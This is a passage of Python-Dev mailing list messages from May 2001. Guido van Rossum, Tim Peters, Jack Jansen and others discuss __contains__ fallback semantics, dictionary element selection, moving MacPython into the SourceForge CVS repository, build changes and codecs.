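            return True
    return False
```

Because the getattr() check never calls __contains__, an AttributeError raised from within a user's __contains__ method reaches the caller instead of silently triggering the fallback loop.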

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Sat May  5 21:40:11 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 5 May 2001 16:40:11 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105051224.HAA14948@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>

[Guido]
> This kind of thing happens everywhere -- instances always define all
> slots but using the slots sometimes fails when the corresponding
> __foo__ doesn't exist.  Decisions based on the presence or absence of
> a slot are therefore in general not reliable; the only exception is
> the decision to *call* the slot or not.  The correct solution is not
> to catch AttributeError and pretend that the slot didn't exist (which
> would mask an AttributeError occurring inside the __contains__ method
> if there was one),

Ya, it sucks.  I was inspired by the fact that instance_contains() itself makes
dubious assumptions about what an AttributeError means when the functions
*it* calls raise it <wink>.

> but to reimplement the default behavior in the instance slot
> implementation.

The "backward compatibility" comment in instance_contains() was scary:
compatibility with *what*?  instance_contains() is pretty darn new.  I
assumed it meant there was *some* good (but unidentified) reason we had to
use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
instance_item() "worked".  But I haven't thought of one, except to ensure
that

    some_complex  in  some_instance_with___getitem__

continues to blow up -- but that's not a good reason.  So:

> In this case, that means that PySequence_Contains() can be simplified
> (no need to test for AttributeError), and instance_contains() should
> fall back to a loop over iter(self) rather than trying to use
> instance_item().

Will do!


From guido@digicool.com  Sat May  5 22:48:33 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 16:48:33 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 16:40:11 -0400."
 <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCOEHCKAAA.tim.one@home.com>
Message-ID: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>

> [Guido]
> > This kind of thing happens everywhere -- instances always define all
> > slots but using the slots sometimes fails when the corresponding
> > __foo__ doesn't exist.  Decisions based on the presence or absence of
> > a slot are therefore in general not reliable; the only exception is
> > the decision to *call* the slot or not.  The correct solution is not
> > to catch AttributeError and pretend that the slot didn't exist (which
> > would mask an AttributeError occurring inside the __contains__ method
> > if there was one),

[Tim]
> Ya, it sucks.  I was inspired by the fact that instance_contains() itself makes
> dubious assumptions about what an AttributeError means when the functions
> *it* calls raise it <wink>.

Actually, instance_contains checks for AttributeError only after
calling instance_getattr(), whose only purpose is to return the
requested attribute or raise AttributeError, so here it is safe: the
__contains__ function hasn't been called yet.

> > but to reimplement the default behavior in the instance slot
> > implementation.
> 
> The "backward compatibility" comment in instance_contains() was scary:
> compatibility with *what*?

With previous behavior of 'x in instance'.  Before we had
__contains__, 'x in y' *always* iterated over the items of y as a
sequence, comparing them to x one at a time.  The loop does that.

> instance_contains() is pretty darn new.  I
> assumed it meant there was *some* good (but unidentified) reason we had to
> use PyObject_Cmp() instead of PyObject_RichCompareBool(..., Py_EQ) if
> instance_item() "worked".

No, that was probably just an oversight -- clearly it should have used
rich comparisons.  (I guess this is a disadvantage of the approach I'm
recommending here: if the default behavior changes, the
reimplementation of the default behavior in the class must be changed
too.)

> But I haven't thought of one, except to ensure
> that
> 
>     some_complex  in  some_instance_with___getitem__
> 
> continues to blow up -- but that's not a good reason.

Indeed not.

> So:
> 
> > In this case, that means that PySequence_Contains() can be simplified
> > (no need to test for AttributeError), and instance_contains() should
> > fall back to a loop over iter(self) rather than trying to use
> > instance_item().
> 
> Will do!

Thanks!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Sat May  5 22:24:58 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 5 May 2001 17:24:58 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052148.QAA17253@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>

[Guido]
> Actually, instance_contains checks for AttributeError only after
> calling instance_getattr(), whose only purpose is to return the
> requested attribute or raise AttributeError, so here it is safe: the
> __contains__ function hasn't been called yet.

I'd say "safer", but not "safe":  at that point we only know that *some*
attribute didn't exist, somewhere, while attempting to look up
"__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
hook, like

    def __getattr__(self, attr):
        return global_resolver.resolve(self, attr)

where global_resolver has lost its "resolve" attr.  "except" clauses aren't
more bulletproof in C than in Python <0.9 wink>.
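Tim's scenario is easy to reproduce. In this sketch, Resolver, global_resolver, Proxy and probe() are hypothetical names following his example. An instance-level lookup of __contains__ reaches __getattr__, whose bug raises an AttributeError that is indistinguishable from "no such attribute":

```python
class Resolver:
    """Stand-in for Tim's global_resolver after it has lost .resolve."""


global_resolver = Resolver()


class Proxy:
    def __getattr__(self, attr):
        # Bug: global_resolver has no 'resolve', so this raises AttributeError,
        # which looks exactly like "attribute `attr` does not exist".
        return global_resolver.resolve(self, attr)


def probe(obj, name):
    """Return (hasattr result, message of the AttributeError actually raised)."""
    try:
        getattr(obj, name)
    except AttributeError as exc:
        return hasattr(obj, name), str(exc)
    return True, ""
```

probe(Proxy(), "__contains__") reports False from hasattr(), while the swallowed error message actually complains about 'resolve'.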

> With previous behavior of 'x in instance'.  Before we had
> __contains__, 'x in y' *always* iterated over the items of y as a
> sequence, comparing them to x one at a time.

I don't believe I ever knew that!  Thanks.  I erroneously assumed that the
looping behavior was *introduced* when __contains__ was added.

> ...
> No, that was probably just an oversight -- clearly it should have used
> rich comparisons.  (I guess this is a disadvantage of the approach I'm
> recommending here: if the default behavior changes, the
> reimplementation of the default behavior in the class must be changed
> too.)

I factored out the new iterator-based __contains__ logic into a new private
API function, called when appropriate by both PySequence_Contains() and
instance_contains().  So any future changes to what iterator-based
__contains__ means will only need to be made in one place.

too-easy<wink>-ly y'rs  - tim


From guido@digicool.com  Sat May  5 23:31:05 2001
From: guido@digicool.com (Guido van Rossum)
Date: Sat, 05 May 2001 17:31:05 -0500
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: Your message of "Sat, 05 May 2001 17:24:58 -0400."
 <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCGEHFKAAA.tim.one@home.com>
Message-ID: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>

> [Guido]
> > Actually, instance_contains checks for AttributeError only after
> > calling instance_getattr(), whose only purpose is to return the
> > requested attribute or raise AttributeError, so here it is safe: the
> > __contains__ function hasn't been called yet.

[Tim]
> I'd say "safer", but not "safe":  at that point we only know that *some*
> attribute didn't exist, somewhere, while attempting to look up
> "__contains__".  Ignoring it could, e.g., be masking a bug in a __getattr__
> hook, like
> 
>     def __getattr__(self, attr):
>         return global_resolver.resolve(self, attr)
> 
> where global_resolver has lost its "resolve" attr.  "except" clauses aren't
> more bulletproof in C than in Python <0.9 wink>.

Yes, but attribute errors inside __getattr__ hooks are *always* a
problem to debug, since raising AttributeError is part of its job.  So
this is not new.  I should have said "as safe as it gets."

> > With previous behavior of 'x in instance'.  Before we had
> > __contains__, 'x in y' *always* iterated over the items of y as a
> > sequence, comparing them to x one at a time.
> 
> I don't believe I ever knew that!  Thanks.  I erroneously assumed that the
> looping behavior was *introduced* when __contains__ was added.

Surely you knew that "x in y" looped over the items of y?  What else
could it have done?  It was only defined on sequences!

> > ...
> > No, that was probably just an oversight -- clearly it should have used
> > rich comparisons.  (I guess this is a disadvantage of the approach I'm
> > recommending here: if the default behavior changes, the
> > reimplementation of the default behavior in the class must be changed
> > too.)
> 
> I factored out the new iterator-based __contains__ logic into a new private
> API function, called when appropriate by both PySequence_Contains() and
> instance_contains().  So any future changes to what iterator-based
> __contains__ means will only need to be made in one place.

Cool.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Sat May  5 22:53:51 2001
From: tim.one@home.com (Tim Peters)
Date: Sat, 5 May 2001 17:53:51 -0400
Subject: [Python-Dev] RE: PySequence_Contains
In-Reply-To: <200105052231.RAA17447@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEHHKAAA.tim.one@home.com>

[Guido]
> ...
> Surely you knew that "x in y" looped over the items of y?  What else
> could it have done?  It was only defined on sequences!

What's a sequence <wink>?  I expect I assumed that enduring a Python method
call for every element of an *instance* was so expensive that Python didn't
bother implementing "in" for instances (just for builtin sequences like lists
and strings etc).  I *know* I assumed it was so expensive that I never tried
it (indeed, I doubt I've used "[not] in" on *any* sort of sequence excepting
"if x in s" where s was a tuple, list or string of length no more than 4; for
anything bigger I always used a dict or bisect).  So it's a personal blind
spot likely due to never looking in that direction.
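The pre-__contains__ behaviour Guido describes still works for a class that defines only __getitem__: "in" calls it with 0, 1, 2, ... until a match or IndexError. This sketch (Squares is a hypothetical class) counts those calls, which is the per-element Python method call cost Tim was wary of:

```python
class Squares:
    """Pre-__contains__ style sequence: only __getitem__, IndexError at the end."""

    def __init__(self, n):
        self.n = n
        self.calls = 0  # counts Python-level __getitem__ calls

    def __getitem__(self, i):
        self.calls += 1
        if i >= self.n:
            raise IndexError(i)  # tells the "in" loop the sequence is over
        return i * i
```

9 in Squares(5) stops after 4 calls; 10 in Squares(5) makes 6, the last one ending the search with IndexError. A dict or set membership test avoids this per-element loop by hashing.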


From paul@pfdubois.com  Sun May  6 02:10:37 2001
From: paul@pfdubois.com (Paul F. Dubois)
Date: Sat, 5 May 2001 18:10:37 -0700
Subject: [Python-Dev] multiple inheritance -- what I meant
Message-ID: <ADEOIFHFONCLEEPKCACCKEPMCIAA.paul@pfdubois.com>

When I suggested a modification to the inheritance clause,

class X (Y rename a as b, c as d, Z rename foo as bar):

someone suggested this was the same as

class X (Y, Z):
    b = Y.a
    d = Y.c
    bar = Z.foo

I meant two things by my suggestion:

1. I meant that Y.a would never be found when searching for X.a.

In particular, if Z.a exists, and a is not explicitly defined in X, X.a is
Z.a.

2. More philosophically, rather than being a consequence of the language
like the second method is, the proposed syntax is intended to be a clear
message to someone reading the class about how the inherited names are being
handled. Compare the effort required of a reader to understand these two.
(If you think the second one is easier, you probably attended Spam III.)

If you can rename in this way there are no problems with multiple
inheritance.

To be complete you should probably also allow

Y undefine x, ...

which simply makes Y.x unavailable from X.
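Paul's first point (a renamed name must disappear under its old name, so lookup falls through to the next base) can be approximated without new syntax. A rough sketch, assuming a hypothetical helper renamed() that builds a stand-in base class; the real proposal is a language change, and this only mimics its lookup semantics:

```python
def renamed(base, undefine=(), **renames):
    """Return a stand-in base class for `base` with some attributes renamed.

    Hypothetical helper mimicking 'Y rename a as b' and 'Y undefine x':
    a renamed or undefined name is absent under its old name, so lookup
    on a subclass falls through to the next base in the MRO.
    """
    namespace = {}
    # Copy non-dunder attributes along base's MRO; more-derived classes win.
    for klass in reversed(base.__mro__):
        if klass is object:
            continue
        for name, value in vars(klass).items():
            if not (name.startswith("__") and name.endswith("__")):
                namespace[name] = value
    for old, new in renames.items():
        namespace[new] = namespace.pop(old)
    for name in undefine:
        del namespace[name]
    return type(base.__name__ + "_renamed", (), namespace)


# Usage with the names from the example above.
class Y:
    a = "Y.a"
    c = "Y.c"


class Z:
    a = "Z.a"
    foo = "Z.foo"


class X(renamed(Y, a="b", c="d"), renamed(Z, foo="bar")):
    pass  # X.a is Z.a, because Y's a now only exists as b


class Aliased(Y, Z):
    # The suggested equivalent: Aliased.a still finds Y.a first.
    b = Y.a
    d = Y.c
    bar = Z.foo
```

Limitations of the sketch: the stand-in bases are new classes, so isinstance(X(), Y) is False, and copied methods that use zero-argument super() will not work.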


From Greg.Wilson@baltimore.com  Sun May  6 17:26:00 2001
From: Greg.Wilson@baltimore.com (Greg Wilson)
Date: Sun, 6 May 2001 12:26:00 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
Message-ID: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>

Has anyone else found themselves wanting a method that
chooses and returns a dictionary element at random, without
removing it (as popitem does)?  Or is there some way to
tell popitem to return a value without mutating the container?
If neither, would this be useful, or is it DHG?

Thanks
Greg


From tim.one@home.com  Sun May  6 19:15:57 2001
From: tim.one@home.com (Tim Peters)
Date: Sun, 6 May 2001 14:15:57 -0400
Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'?
In-Reply-To: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEIIKAAA.tim.one@home.com>

[Greg Wilson]
> Has anyone else found themselves wanting a method that
> chooses and returns a dictionary element at random,

Do you mean "random" or "arbitrary"?  "random" means every dict entry is
equally likely to be chosen; "arbitrary" means nothing is defined about the
result (except that it *is* a dict entry).  random is much more expensive to
implement (under the covers it's a vector, but a vector with holes, so you
can't just pick a *slot* at random then "slide over" to the first non-hole
(else a given entry's chance of being selected would be proportional to the #
of contiguous holes adjacent to it)).
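Tim's argument about the "slide over" shortcut can be checked exactly. In this sketch, slide_probabilities() and random_item() are hypothetical helpers, and a plain list with None holes stands in for the dict's internal vector. Every starting slot is enumerated, and the unbiased alternative pays for an O(n) copy:

```python
import random


def slide_probabilities(slots):
    """Exact pick probabilities for 'choose a random slot, slide to next entry'.

    `slots` models a hash table's vector: None marks a hole.  Assumes at
    least one non-None entry; sliding wraps from the end to the start.
    """
    n = len(slots)
    counts = {}
    for start in range(n):          # every slot is equally likely as a start
        i = start
        while slots[i] is None:     # slide over the holes
            i = (i + 1) % n
        counts[slots[i]] = counts.get(slots[i], 0) + 1
    return {entry: c / n for entry, c in counts.items()}


def random_item(d):
    """Uniformly random (key, value) pair; O(len(d)) because of the copy."""
    if not d:
        raise KeyError("random_item(): dictionary is empty")
    return random.choice(list(d.items()))
```

For ["a", None, None, "b", "c", None] the probabilities are 2/6, 3/6 and 1/6 for "a", "b" and "c": "b" sits after two holes, so it is three times as likely as "c".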

> without removing it (as popitem does)?

Note that, in the sense above, popitem() returns an arbitrary element.

> Or is there some way to tell popitem to return a value without
> mutating the container?

No.  Easy to write an efficient function that does, though:

def arb(dict):
    k, v = pair = dict.popitem()
    dict[k] = v  # restore the entry
    return pair

Given the new dict iterators in 2.2, there's an easier fast way that doesn't
mutate the dict even under the covers:

def arb(dict):
    if dict:
        return dict.iteritems().next()
    raise KeyError("arb passed an empty dict")
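In Python 3, dict.iteritems() and the iterator .next() method no longer exist. The same non-mutating idea might be written as follows (a sketch keeping Tim's function name):

```python
def arb(d):
    """Return an arbitrary (key, value) pair of `d` without mutating it."""
    if d:
        # Python 3 spelling of dict.iteritems().next()
        return next(iter(d.items()))
    raise KeyError("arb passed an empty dict")
```

Since Python 3.7 dicts preserve insertion order, so this returns the first-inserted pair, while popitem() returns the last-inserted one.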

> If neither, would this be useful, or is it DHG?

Do you have a particular algorithm, or class of algorithms, in mind for which
it is useful?  popitem's current behavior is most useful for me in the set
algorithms I've used, usually in the form:

    while working_set:
        x, dontcare = working_set.popitem()
        process(x)  # which may add more elts to working_set
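A concrete instance of that working-set pattern, as a sketch: reachable() and the graph format are hypothetical, with process(x) becoming "mark x as seen and queue its unseen neighbours". A dict with dummy values serves as the set, as in Tim's loop:

```python
def reachable(graph, start):
    """Return every node reachable from `start` in an adjacency-dict graph."""
    seen = set()
    working_set = {start: None}          # dict used as a set, values unused
    while working_set:
        x, dontcare = working_set.popitem()
        if x in seen:
            continue
        seen.add(x)
        for y in graph.get(x, ()):       # "process" x: may add more elements
            if y not in seen:
                working_set[y] = None
    return seen
```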


From jack@oratrix.nl  Mon May  7 10:39:43 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:39:43 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl>

Folks,
now that there's finally a decent (well, somewhat decent:-) Mac CVS client 
that supports ssh I'd like to move MacPython to sourceforge. There's two ways 
I can go about this: start a new MacPython project or merge the MacPython 
stuff into the main Python CVS repository.

The Mac specific stuff for Python is all concentrated in a single subtree Mac 
of the main Python tree (the subtree has its own hierarchy of 
Python/Modules/Lib/etc directories), so putting it in the main repository 
should not pollute the file namespace all that much. It would also have the 
advantage that a single "cvs update" would update everything (whereas the 
current situation for Mac developers, where Python/Mac is from a different 
CVSROOT than Python, does not have that advantage). The downside is that 
everyone who does a full checkout of the tree would get an extra 1000 or so 
files on their disk that are pretty useless unless they have a mac.

Oh yes, another plus for putting stuff in the main repository is MacOSX 
support. Some MacPython modules have been "ported" to MacOSX, and I've started 
on adding them to setup.py, and life would become a lot simpler for people 
compiling on MacOSX if they had everything available automatically.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack@oratrix.nl  Mon May  7 10:45:59 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:45:59 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core
Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl>

To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
of Python does not allow for an easy addition of a platform-dependent 
sourcefile to the core interpreter (or am I missing something?). This is a bit 
of functionality I need to port the various Mac modules to MacOSX-python. The 
platform-dependent source file has various glue routines for turning MacOS error 
codes into exceptions and that sort of stuff.

Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From jack@oratrix.nl  Mon May  7 10:49:17 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 11:49:17 +0200
Subject: [Python-Dev] Need a search path for modules in setup.py
Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl>

(Don't worry, this is the last in my flurry of OSX related messages:-)

Life would be a lot simpler for me if setup.py (the one for the main extension 
modules) would have a search path for module sourcefiles. As Mac modules 
currently live in Python/Mac/Modules (as opposed to Python/Modules) not having 
a search path means I get ugly "../Mac/Modules/foomodule.c" constructs.

I have the code for setup.py ready, is it OK if I check it in?
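A minimal sketch of the kind of lookup Jack describes; find_source() and the directory names are hypothetical, not his actual setup.py change:

```python
import os


def find_source(filename, search_path):
    """Return the first os.path.join(directory, filename) that exists.

    Directories are tried in order, so earlier entries take precedence.
    """
    for directory in search_path:
        candidate = os.path.join(directory, filename)
        if os.path.exists(candidate):
            return candidate
    raise FileNotFoundError(
        "%s not found in any of %r" % (filename, list(search_path)))
```

With a search path like ["Modules", os.path.join("Mac", "Modules")], a module entry could name "foomodule.c" instead of "../Mac/Modules/foomodule.c".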
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | ++++ see http://www.xs4all.nl/~tank/ ++++


From loewis@informatik.hu-berlin.de  Mon May  7 10:53:54 2001
From: loewis@informatik.hu-berlin.de (Martin von Loewis)
Date: Mon, 7 May 2001 11:53:54 +0200 (MEST)
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de>

> There's two ways I can go about this: start a new MacPython project
> or merge the MacPython stuff into the main Python CVS repository.

There is actually a third option: Use the Python SF project, but
create a new module in the Python CVS repository (so no merging would
be done).

I don't know how much code this is. I'd favour merging the Mac code
into the core distribution. If there are loads of Mac-specific modules
that not every MacPython user needs, it might be advisable to create a
distutils package that contains the extra modules. Such a package
should still live in cvs.python.sourceforge.net:/cvsroot/python.

Just my 0.02EUR,

Martin


From guido@digicool.com  Mon May  7 15:00:08 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 07 May 2001 09:00:08 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200."
 <200105070953.LAA14803@pandora.informatik.hu-berlin.de>
References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de>
Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com>

[Jack]
> > There's two ways I can go about this: start a new MacPython project
> > or merge the MacPython stuff into the main Python CVS repository.

We have platform-specific subdirectories for so many projects that
it's a shame we don't have the Mac code in there as well!

The only (small) advantage I can imagine of a separate MacPython
project would be that you (Jack) can more easily give others commit
permission to the Mac tree without giving them commit permission to
all of Python (which requires they gain the trust of a larger group of
Python developers).  Of course, I don't know if you expect much help
from others who are not already Python developers.

[Martin]
> There is actually a third option: Use the Python SF project, but
> create a new module in the Python CVS repository (so no merging would
> be done).

I don't know much about modules, but would this allow Jack to check
out the main code and the MacPython code into a single work directory
(which he needs)?  If so, it may be the best solution.

Note that no matter how you do it, you'll have to submit a tree of RCS
files to the SF sysadmins to load, unless you want to lose years of
MacPython cvs logs...

> I don't know how much code this is. I'd favour merging the Mac code
> into the core distribution. If there are loads of Mac-specific modules
> that not every MacPython user needs, it might be advisable to create a
> distutils package that contains the extra modules. Such a package
> should still live in cvs.python.sourceforge.net:/cvsroot/python.

Undecidedly yours,

(Jack, regarding your Makefile and setup.py changes: I'd wait for
opinions on your patches from Neil and Andrew.  I don't see why
they would have an objection to adding these features, but the
specific implementation you propose might be subject to comments.)

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com (Skip Montanaro)  Mon May  7 14:04:15 2001
From: skip@pobox.com (Skip Montanaro)
Date: Mon, 7 May 2001 08:04:15 -0500
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
References: <20010507093944.1A340312BA0@snelboot.oratrix.nl>
Message-ID: <15094.40271.461338.638822@beluga.mojam.com>

    Jack> ... I'd like to move MacPython to sourceforge. There's two ways I
    Jack> can go about this: start a new MacPython project or merge the
    Jack> MacPython stuff into the main Python CVS repository.

I say merge.  

Skip


From nas@python.ca  Mon May  7 14:14:52 2001
From: nas@python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:14:52 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200
References: <20010507094600.217CE312BA0@snelboot.oratrix.nl>
Message-ID: <20010507061452.A23494@glacier.fnational.com>

Jack Jansen wrote:
> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> of Python does not allow for an easy addition of a platform-dependent 
> sourcefile to the core interpreter (or am I missing something?).

No, it's still a big ugly hack. :-)

> This is a bit of functionality I need to port the various Mac
> modules to MacOSX-python. The platform-dependent source file has
> various glue routines for turning MacOS error codes into
> exceptions and that sort of stuff.
> 
> Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?

How would this work?  Would MACHDEP_OBJS be set by an autoconf
substitution?

  Neil


From jack@oratrix.nl  Mon May  7 14:17:18 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:17:18 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
In-Reply-To: Message by Guido van Rossum <guido@digicool.com> ,
 Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com>
Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>

> We have platform-specific subdirectories for so many projects that
> it's a shame we don't have the Mac code in there as well!

Great! I'll pack up my repository and send it to the 
sourceforge-powers-that-be shortly. The write permission for other MacPython 
developers shouldn't be a problem; I think Just is currently the only person 
with write permission (but I have to check).


> (Jack, regarding your Makefile and setup.py changes: I'd wait for
> opinions on your patches from Neil and Andrew.  I don't see why
> they would have an objection to adding these features, but the
> specific implementation you propose might be subject to comments.)

Definitely. I'll put them up as patches and then see what happens.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From jack@oratrix.nl  Mon May  7 14:27:14 2001
From: jack@oratrix.nl (Jack Jansen)
Date: Mon, 07 May 2001 15:27:14 +0200
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: Message by Neil Schemenauer <nas@python.ca> ,
 Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com>
Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl>

> Jack Jansen wrote:
> > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup 
> > of Python does not allow for an easy addition of a platform-dependent 
> > sourcefile to the core interpreter (or am I missing something?).
> [...]
> > 
> > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS?
> 
> How would this work?  Would MACHDEP_OBJS be set by an autoconf
> substitution?

Yes, that's what I had in mind (haven't written the code yet). Similar to the 
way DYNLOADFILE is set, but empty for all platforms except for OSX.
--
Jack Jansen             | ++++ stop the execution of Mumia Abu-Jamal ++++
Jack.Jansen@oratrix.com | ++++ if you agree copy these lines to your sig ++++
www.oratrix.nl/~jack    | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm 


From nas@python.ca  Mon May  7 14:30:42 2001
From: nas@python.ca (Neil Schemenauer)
Date: Mon, 7 May 2001 06:30:42 -0700
Subject: [Python-Dev] Added a machine-dependent file to the core
In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200
References: <nas@python.ca> <20010507132714.B0808312BA1@snelboot.oratrix.nl>
Message-ID: <20010507063042.D23494@glacier.fnational.com>

Jack Jansen wrote:
> Yes, that's what I had in mind (haven't written the code yet). Similar to the 
> way DYNLOADFILE is set, but empty for all platforms except for OSX.

Sounds good to me.  Try to keep the code somewhat general so that
other platforms may use it.

  Neil


From mal@lemburg.com  Mon May  7 19:44:55 2001
From: mal@lemburg.com (M.-A. Lemburg)
Date: Mon, 07 May 2001 20:44:55 +0200
Subject: [Python-Dev] "data".decode(encoding) ?!
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com>
 <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com>
Message-ID: <3AF6ED27.FB2C077B@lemburg.com>

Guido van Rossum wrote:
> 
> > I've attached the patch. Due to a small reorganisation the
> > patch is a little longer -- symmetry has its price at C level
> > too ;-)
> 
> Looks good on paper, so go ahead and check it in.  Watch out for
> potential changes caused by Tim's iter-crusade!  :-)

OK. I'll look into this later this week.
 
> While you're at it, why don't you check in the rot13 codec you posted
> -- it's good to have simple examples in the standard library.
> It would also be cool to have codecs for common file encodings like
> base64, quoted-printable, binhex, uuencode, and even hex
> (binascii.hexlify).

Right. I'll add these in the next few weeks -- as time comes
along.
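For reference, a minimal sketch of how these codecs are reached in modern Python 3 (this reflects today's `codecs` API, not necessarily what was checked in for 2.2): rot13 is a str-to-str codec, while hex and base64 are bytes-to-bytes transforms reachable through `codecs.encode`/`codecs.decode`.

```python
import binascii
import codecs

# rot13 is a str-to-str codec: every ASCII letter is rotated 13 places.
assert codecs.encode("Hello, Python-Dev", "rot13") == "Uryyb, Clguba-Qri"
# Decoding applies the same rotation, restoring the original text.
assert codecs.decode("Uryyb, Clguba-Qri", "rot13") == "Hello, Python-Dev"

# The file-style encodings are bytes-to-bytes codecs.
data = b"spam"
assert codecs.encode(data, "hex") == binascii.hexlify(data) == b"7370616d"
assert codecs.encode(data, "base64") == b"c3BhbQ==\n"   # note the trailing newline
assert codecs.decode(codecs.encode(data, "base64"), "base64") == data
```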

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From martin@loewis.home.cs.tu-berlin.de  Mon May  7 22:21:27 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 7 May 2001 23:21:27 +0200
Subject: [Python-Dev] Moving MacPython to sourceforge
Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de>

> I don't know much about modules, but would this allow Jack to check
> out the main code and the MacPython code into a single work
> directory (which he needs)?

Using CVS modules allows you to merge parts of the tree into a single
sandbox. E.g., you could add this entry to CVSROOT/modules:

macpython python/dist/src &Mac

'cvs co macpython' would then give you a dist/src directory which
also contains a Mac directory (where Mac is another module: either a
top-level directory alongside /python, or another CVSROOT/modules entry).

You could use an exclude list, e.g.

macpython !PC !PCbuild !RISCOS python/dist/src &Mac

What you *cannot* do is to merge modules on a per-directory basis; all
files in a single directory must come from the same CVS module - you
can think of ampersand modules as similar to Unix mount(1)ed file
systems.

Regards,
Martin


From tim.one@home.com  Tue May  8 05:14:22 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 8 May 2001 00:14:22 -0400
Subject: [Python-Dev] Help with SF bug 105470
Message-ID: <LNBBLJKPBEHFEDALKOLCGEMFKAAA.tim.one@home.com>

An ancient bug just got (re?)discovered on c.l.py, which I entered into SF:

http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470&atid=105470

This has to do w/ gross loss of precision in manifest Python float constants,
if and only if a module is loaded from .pyc or .pyo format.  Since it's
fp-related, and fp is tricky x-platform, I'd like some volunteers to test
